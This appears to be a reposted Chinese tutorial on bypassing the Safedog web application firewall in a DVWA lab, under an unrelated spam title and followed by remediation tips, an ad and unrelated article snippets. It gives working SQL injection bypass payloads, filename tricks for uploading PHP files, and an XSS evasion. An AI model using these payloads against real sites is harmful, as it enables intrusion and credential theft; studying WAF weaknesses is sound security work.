做网站开发没有人带做社交网站用什么语言

张小明 2026/1/13 8:42:50
做网站开发没有人带,做社交网站用什么语言,手机无法登录wordpress,一站式服务图片前言 本文以最新版安全狗为例#xff0c;总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法#xff0c;希望能起到抛砖引玉的效果。如果师傅们有更好的方法#xff0c;烦请不吝赐教。 PS#xff1a;本文仅用于技术研究与讨论#xff0c;严禁用于任何非法用途总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法希望能起到抛砖引玉的效果。如果师傅们有更好的方法烦请不吝赐教。PS本文仅用于技术研究与讨论严禁用于任何非法用途违者后果自负作者与平台不承担任何责任测试环境PHPStudyPHP5.4.45ApacheMySQL5.5.53最新版安全狗4.0.28330靶场使用DVWAhttp://www.dvwa.co.uk/SQL注入判断是否存在注入方法一and 11被拦截单独的and是不拦截的。and后面加数字或者字符的表达式会被匹配拦截。1112的本质是构造一个真、假值我们可以直接用True,False代替但是依然会被拦截。不过and也可以用 代替。我们构造1’ True --就可绕过1’ False --方法二将and 后面的数字或者字符表达式加几个内联注释也可以绕过。内联注释/* */ 在mysql中是多行注释 但是如果里面加了! 那么后面的内容会被执行。这些语句在不兼容的数据库中使用时便不会执行如1’ and /*!1*//*!1*/ --1’ and /*!1*//*!2*/ --方法三 分块传输分块传输的原理请自行检索这里不再赘述。分块传输插件https://github.com/c0ny1/chunked-coding-converter/releases/tag/0.2.1正常写测试payload : 1’ and 11 --将请求方式改为POST然后进行分块传输编码可以看到没有被拦截。1’ and 12 --猜解字段数方法一order by被拦截单独的order和单独的by都不会被拦截我们需要在order by之间加各种无效字符。可以将 1’ order /* x x x xxx xxx*/ by 1 -- 放burp里跑各种垃圾参数字典来爆破。经过测试**1’ order/*%%!asd%%%%*/by 3 --**可以成功过狗通过内联注释/*!*/和注释/**/以及一些无效字符也可以绕过需要不断Fuzz尝试1’ /*!order/*!/*/**/by*/ 3 --方法二 分块传输1’ order by 3 --获取当前数据库方法一1’ union select 1,database() -- 被拦截分开测试 union select 会被拦截database() 也会被拦截先绕过union select和之前order by的绕过方法一样1’ union/*%%!asd%%%%*/select 1,2 --再绕过database()经过测试我们发现单独的database不会被拦截加了括号就会了我们将之前的垃圾数据/*%%!asd%%%%*/放到括号了即可成功绕过拼接一下最终的payload为1’ union/*%%!asd%%%%*/select 1,database(/*%%!asd%%%%*/) --方法二 分块传输分块传输依然可以1’ union select 1,database() --获取数据库中的表方法一正常注入语句1’ union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() --根据前面的测试这个绕过就很简单了只需要将一个空格地方替换成**/*%%!asd%%%%*/**即可。Payload1’ union/*%%!asd%%%%*/select 1,group_concat(table_name) /*%%!asd%%%%*/from /*%%!asd%%%%*/information_schema.tables where table_schemadatabase(/*%%!asd%%%%*/) --方法二 分块传输获取表中的字段名方法一正常注入语句1’ union select 1,group_concat(column_name) from information_schema.columns where table_name’users’ --绕过方法和获取表的操作无异:1’ union/*%%!asd%%%%*/select 1,group_concat(column_name) /*%%!asd%%%%*/from/*%%!asd%%%%*/information_schema.columns where table_name’users’ --方法二 分块传输获取数据方法一正常注入语句1’ union select group_concat(user),group_concat(password) from users --绕过方法还是一样1’ union/*%%!asd%%%%*/select group_concat(user),group_concat(password) /*%%!asd%%%%*/from/*%%!asd%%%%*/users --方法二 分块传输文件上传安全狗对文件上传的拦截是通过检测文件扩展名来实现的。只要解析结果在禁止上传的文件类型列表中就会被拦截。我们要做的就是构造各种畸形数据包以混淆WAF的检测规则。获取文件名的地方在Content-Disposition和Content-Type所以绕过的地方也主要在这两个地方直接上传PHP文件会被拦截绕过方法1将filename”hhh.php” 改为filenamehhh.php;即可绕过绕过方法2各种换行主要是要把点号和字符串”php”分开绕过方法3将filename”hhh.php” 改为filename”hhh.php”(三个等号也可以绕过)绕过方法4文件名之间放置分号filename”hh;h.php”绕过方法5多个filename”hhh.txt”最后一个filename”hhh.php”XSS查看安全狗的漏洞防护规则可以发现安全狗对XSS的防护是基于黑名单的我们只要fuzz一下哪些标签没有被过滤就好了。有很多标签可以绕过这里举例两种(1) 标签定义声音比如音乐或其他音频流。(2) 标签,data属性alert(‘xss’)的base64编码PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4payload:文件包含通过绝对路径、相对路径稍微加些混淆就能绕过…修复建议我们研究WAF绕过的目的主要是为了警醒网站开发者并不是部署了WAF就可以高枕无忧了要明白漏洞产生的根本原因最好能在代码层面上就将其修复。下面给出一些修复建议SQL注入使用预编译sql语句查询和绑定变量使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口使用此接口可以非常有效的防止SQL注入攻击。对用户输入的数据格式进行严格要求,比如编号只能输入数字就只能输入数字,只能输入字母就只能输入字符,并且对数据的长度进行限制。文件上传文件上传的目录设置为不可执行只要Web容器无法解析该目录下的文件即使攻击者上传了脚本文件服务器本身也不会受到影响。在实际的上传应用中可以将文件上传后放到独立的存储上做静态文件处理一方面方便使用缓存加速降低性能损耗另一方面也杜绝了脚本执行的可能。使用随机数改写文件名和文件路径上传文件时服务端采用白名单形式限制文件上传的后缀名称只允许上传“jpg、png、gif、bmp 、doc、docx、rar、zip”等非Web脚本执行文件。XSS对用户输入的参数中的特殊字符进行HTML转义或者编码防止出现有意义的HTML、CSS、JavaScript代码如“’、”、、、(、、.”等特殊字符。可以通过Filter过滤器实现全局编码或者转义也可以在单点对字符串类型数据进行编码或者转义。学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】这些东西我都可以免费分享给大家需要的可以点这里自取:网安入门到进阶资源
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

电商公司官网安徽网站关键词优化排名

如何在 TensorFlow 中实现梯度裁剪的不同策略 在深度学习的实际训练中,模型“跑飞”——损失突然飙升、参数更新失控、甚至出现 NaN——是不少开发者都曾经历的噩梦。尤其当你投入大量时间调参、准备数据后,却发现 LSTM 或深层网络在第 5 个 epoch 就彻…

张小明 2026/1/13 1:01:53 网站建设

网站开发注意问题福州专业做网站公司

浏览器图标集 Browser Logos 完全使用指南 【免费下载链接】browser-logos 🗂 High resolution web browser logos 项目地址: https://gitcode.com/gh_mirrors/br/browser-logos 项目概述 Browser Logos 是一个专为网页开发者和设计师打造的高质量浏览器图标…

张小明 2026/1/12 19:20:55 网站建设

如何购买网站服务器wordpress制作的网页

高效实用的系统配置部署指南:从零开始掌握技术部署 【免费下载链接】synology-baiduNetdisk-package 项目地址: https://gitcode.com/gh_mirrors/sy/synology-baiduNetdisk-package 想要快速掌握系统配置和技术部署的核心要领吗?本指南将带你从基…

张小明 2026/1/12 18:44:51 网站建设

深圳网站建设制作优化目录 首页 wordpress

YOLOFuse:多模态目标检测的工程化实践 在智能安防、夜间巡检和自动驾驶等现实场景中,单一可见光摄像头常常“力不从心”——当环境陷入黑暗、烟雾弥漫或强逆光时,传统基于 RGB 图像的目标检测模型性能急剧下降。这时候,红外&#…

张小明 2026/1/12 21:30:55 网站建设

企业网站开发价南通免费建设网站

💓 博客主页:借口的CSDN主页 ⏩ 文章专栏:《热点资讯》 ViT模型推理加速实战:从算法优化到边缘部署的全链路优化目录ViT模型推理加速实战:从算法优化到边缘部署的全链路优化 引言:ViT的崛起与推理瓶颈 问题…

张小明 2026/1/12 21:57:48 网站建设